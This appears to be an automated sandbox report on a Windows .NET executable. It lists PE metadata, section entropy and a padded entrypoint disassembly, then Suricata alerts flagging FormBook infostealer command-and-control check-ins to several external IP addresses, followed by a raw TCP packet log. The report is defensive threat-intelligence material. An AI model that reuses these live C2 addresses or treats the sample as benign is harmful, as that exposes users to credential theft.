TLSH:	8A15DFC03B25B30ACD6DAD35892ADDB4A2242D68B105F5E36DDE2B5BB5CD2139E0CF50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yc.g..............0..2...8......>P... ...`....... ....................................@................................

File Icon


Icon Hash:	7fe6e7e7e3e3651f

Static PE Info

General

Entrypoint:	0x110e503e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x11000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67886379 [Thu Jan 16 01:40:09 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [11002000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe4fe4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe6000	0x3580	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xea000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe3044	0xe3200	bf9e966e0ed4654f40e772bb246920b2	False	0.8535209995872317	data	7.605942903718738	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe6000	0x3580	0x3600	bbd8004d16d5ee59af7fc58d45864083	False	0.9108072916666666	data	7.684873263605304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xea000	0xc	0x200	b5e7b54bbf05507263f4e316dcde983a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xe6130	0x2f83	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9727041026062649
RT_GROUP_ICON	0xe90b4	0x14	data	1.05
RT_VERSION	0xe90c8	0x2cc	data	0.43575418994413406
RT_MANIFEST	0xe9394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T09:24:00.565719+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49939	47.83.1.90	80	TCP
2025-01-16T09:24:03.041855+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49956	47.83.1.90	80	TCP
2025-01-16T09:24:05.631051+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49976	47.83.1.90	80	TCP
2025-01-16T09:24:16.412186+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50012	149.104.185.93	80	TCP
2025-01-16T09:24:18.972968+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50013	149.104.185.93	80	TCP
2025-01-16T09:24:21.515846+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50014	149.104.185.93	80	TCP
2025-01-16T09:24:30.021258+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50016	172.67.147.28	80	TCP
2025-01-16T09:24:32.589250+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50017	172.67.147.28	80	TCP
2025-01-16T09:24:34.954625+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50018	172.67.147.28	80	TCP
2025-01-16T09:24:52.282078+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	199.59.243.228	80	TCP
2025-01-16T09:24:54.825395+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	199.59.243.228	80	TCP
2025-01-16T09:24:57.401593+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50022	199.59.243.228	80	TCP
2025-01-16T09:25:05.904207+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	68.65.122.71	80	TCP
2025-01-16T09:25:08.795598+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	68.65.122.71	80	TCP
2025-01-16T09:25:10.891141+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	68.65.122.71	80	TCP
2025-01-16T09:25:19.153213+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	209.74.64.189	80	TCP
2025-01-16T09:25:21.705424+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	209.74.64.189	80	TCP
2025-01-16T09:25:24.299155+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50030	209.74.64.189	80	TCP
2025-01-16T09:25:33.280094+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	160.25.166.123	80	TCP
2025-01-16T09:25:35.816523+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	160.25.166.123	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 09:23:43.354341984 CET	49838	80	192.168.2.4	104.21.83.145
Jan 16, 2025 09:23:43.359225035 CET	80	49838	104.21.83.145	192.168.2.4
Jan 16, 2025 09:23:43.359311104 CET	49838	80	192.168.2.4	104.21.83.145
Jan 16, 2025 09:23:43.368726015 CET	49838	80	192.168.2.4	104.21.83.145
Jan 16, 2025 09:23:43.374552965 CET	80	49838	104.21.83.145	192.168.2.4
Jan 16, 2025 09:23:43.980401039 CET	80	49838	104.21.83.145	192.168.2.4
Jan 16, 2025 09:23:43.981093884 CET	80	49838	104.21.83.145	192.168.2.4
Jan 16, 2025 09:23:43.981162071 CET	49838	80	192.168.2.4	104.21.83.145
Jan 16, 2025 09:23:43.984446049 CET	49838	80	192.168.2.4	104.21.83.145
Jan 16, 2025 09:23:43.989254951 CET	80	49838	104.21.83.145	192.168.2.4
Jan 16, 2025 09:23:59.042459965 CET	49939	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:23:59.047385931 CET	80	49939	47.83.1.90	192.168.2.4
Jan 16, 2025 09:23:59.047511101 CET	49939	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:23:59.060910940 CET	49939	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:23:59.065763950 CET	80	49939	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:00.565718889 CET	49939	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:00.570833921 CET	80	49939	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:00.573013067 CET	49939	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:01.584547043 CET	49956	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:01.589401960 CET	80	49956	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:01.589488983 CET	49956	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:01.604327917 CET	49956	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:01.609230995 CET	80	49956	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:03.041660070 CET	80	49956	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:03.041738033 CET	80	49956	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:03.041855097 CET	49956	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:03.112509966 CET	49956	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:04.131978989 CET	49976	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:04.137172937 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.137303114 CET	49976	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:04.154341936 CET	49976	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:04.159571886 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159610033 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159667969 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159697056 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159724951 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159753084 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159780979 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159807920 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:04.159836054 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:05.628176928 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:05.628288984 CET	80	49976	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:05.631051064 CET	49976	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:05.659508944 CET	49976	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:06.677886963 CET	49992	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:06.682857037 CET	80	49992	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:06.686994076 CET	49992	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:06.697613001 CET	49992	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:06.702477932 CET	80	49992	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:08.157059908 CET	80	49992	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:08.157259941 CET	80	49992	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:08.157308102 CET	49992	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:08.160259962 CET	49992	80	192.168.2.4	47.83.1.90
Jan 16, 2025 09:24:08.165066004 CET	80	49992	47.83.1.90	192.168.2.4
Jan 16, 2025 09:24:15.521053076 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:15.525863886 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:15.525950909 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:15.539639950 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:15.544609070 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.411995888 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412044048 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412137985 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412172079 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412185907 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:16.412208080 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412244081 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412255049 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:16.412276030 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412290096 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:16.412354946 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412384987 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412430048 CET	80	50012	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:16.412456989 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:16.412480116 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:17.050266027 CET	50012	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.069221973 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.074182987 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.077023983 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.097342968 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.102283001 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.972865105 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.972913980 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.972951889 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.972968102 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.972987890 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.973023891 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.973047018 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.973057985 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.973093033 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.973110914 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.973129034 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.973160982 CET	80	50013	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:18.973185062 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:18.973206043 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:19.612588882 CET	50013	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:20.631652117 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:20.636583090 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.636754990 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:20.652053118 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:20.657196045 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657231092 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657258987 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657285929 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657311916 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657360077 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657387018 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657413960 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:20.657439947 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515686035 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515774965 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515846014 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:21.515877962 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515888929 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515901089 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515912056 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515923023 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515934944 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515935898 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:21.515944958 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515958071 CET	80	50014	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:21.515960932 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:21.516011000 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:22.159466028 CET	50014	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:23.178633928 CET	50015	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:23.183538914 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:23.183609962 CET	50015	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:23.194547892 CET	50015	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:23.199357033 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078749895 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078803062 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078814030 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078819990 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078825951 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078831911 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078844070 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078852892 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.078860998 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:24.079070091 CET	50015	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:24.079070091 CET	50015	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:24.084587097 CET	50015	80	192.168.2.4	149.104.185.93
Jan 16, 2025 09:24:24.089344025 CET	80	50015	149.104.185.93	192.168.2.4
Jan 16, 2025 09:24:29.116591930 CET	50016	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:29.121429920 CET	80	50016	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:29.121509075 CET	50016	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:29.136481047 CET	50016	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:29.141323090 CET	80	50016	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:30.020107031 CET	80	50016	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:30.021075964 CET	80	50016	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:30.021258116 CET	50016	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:30.643924952 CET	50016	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:31.664017916 CET	50017	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:31.668911934 CET	80	50017	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:31.668994904 CET	50017	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:31.686389923 CET	50017	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:31.691206932 CET	80	50017	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:32.588870049 CET	80	50017	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:32.589189053 CET	80	50017	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:32.589250088 CET	50017	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:33.190736055 CET	50017	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:34.258471012 CET	50018	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:34.263573885 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.263664961 CET	50018	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:34.283612013 CET	50018	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:34.288651943 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288666964 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288680077 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288691044 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288712025 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288723946 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288734913 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288746119 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.288757086 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.954051018 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.954579115 CET	80	50018	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:34.954624891 CET	50018	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:35.800276995 CET	50018	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:36.850295067 CET	50019	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:37.780076981 CET	80	50019	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:37.780162096 CET	50019	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:37.793531895 CET	50019	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:37.798307896 CET	80	50019	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:38.674061060 CET	80	50019	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:38.674123049 CET	80	50019	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:38.674392939 CET	80	50019	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:38.674572945 CET	50019	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:38.677712917 CET	50019	80	192.168.2.4	172.67.147.28
Jan 16, 2025 09:24:38.682550907 CET	80	50019	172.67.147.28	192.168.2.4
Jan 16, 2025 09:24:51.822705030 CET	50020	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:51.827672958 CET	80	50020	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:51.827754021 CET	50020	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:51.842596054 CET	50020	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:51.847629070 CET	80	50020	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:52.281989098 CET	80	50020	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:52.282027960 CET	80	50020	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:52.282062054 CET	80	50020	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:52.282078028 CET	50020	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:52.282114983 CET	50020	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:53.347033978 CET	50020	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:54.365236998 CET	50021	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:54.370266914 CET	80	50021	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:54.370346069 CET	50021	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:54.383601904 CET	50021	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:54.388601065 CET	80	50021	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:54.824982882 CET	80	50021	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:54.825040102 CET	80	50021	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:54.825073957 CET	80	50021	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:54.825395107 CET	50021	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:55.894722939 CET	50021	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:56.916273117 CET	50022	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:56.921258926 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.921335936 CET	50022	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:56.944113016 CET	50022	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:56.949139118 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949196100 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949224949 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949251890 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949279070 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949491024 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949518919 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949546099 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:56.949572086 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:57.401324034 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:57.401376963 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:57.401417017 CET	80	50022	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:57.401592970 CET	50022	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:57.401592970 CET	50022	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:58.456454039 CET	50022	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.480783939 CET	50023	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.485935926 CET	80	50023	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:59.486067057 CET	50023	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.495326042 CET	50023	80	192.168.2.4	199.59.243.228
Jan 16, 2025 09:24:59.500181913 CET	80	50023	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:59.959383011 CET	80	50023	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:59.959439993 CET	80	50023	199.59.243.228	192.168.2.4
Jan 16, 2025 09:24:59.959479094 CET	80	50023	199.59.243.228	192.168.2.4
